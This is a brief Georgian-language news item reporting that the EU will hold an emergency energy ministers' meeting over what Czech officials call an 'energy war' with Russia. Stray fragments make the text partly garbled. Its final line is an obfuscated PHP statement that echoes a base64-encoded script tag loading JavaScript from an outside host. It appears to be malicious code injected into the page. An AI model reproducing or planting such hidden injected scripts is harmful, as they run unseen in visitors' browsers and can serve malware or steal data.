celsiusi
ავერსი შნაიდერი
ევროკავშირი რუსეთთან „ენერგეტიკული ომის“ შესახებ საგანგებო სხდომას მოიწვევს. ინფორმაციას გამოცემა „გარდიანი“ ავრცელებს.
 
„გარდიანი“ ჩეხეთის პრემიერ-მინისტრზე, პეტრ ფიალაზე დაყრდნობით წერს, რომ ევროკავშირის ენერგეტიკის მინისტრების შეკრება რაც შეიძლება სწრაფად მოხდება.
 
„ევროკავშირის თავმჯდომარე ქვეყნის მოთხოვნით გაიმართება ევროკავშირის ენერგეტიკის მინისტრების სხდომა, რათა განვიხილოთ სპეციფიკური საგანგებო ზომები ენერგოსექტორში შექმნილ სიტუაციასთან დაკავშირებით“, – წერს პეტრ ფიალა მიკრობლოგ „ტვიტერზე“.
 
ჩეხეთი ახლა ევროკავშირის თავმჯდომარე ქვეყანაა. ქვეყნის ვაჭრობის მინისტრმა იოზეფ სიკელამ განაცხადა, რომ ისინი ახლა რუსეთთან „ენერგეტიკულ ომში“ არიან.
 
„ჩვენ ენერგეტიკულ ომში ვართ რუსეთთან და ეს ზიანს აყენებს მთელ ევროკავშირს“, – განაცხადა იოზეფ სიკელამ.
429
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");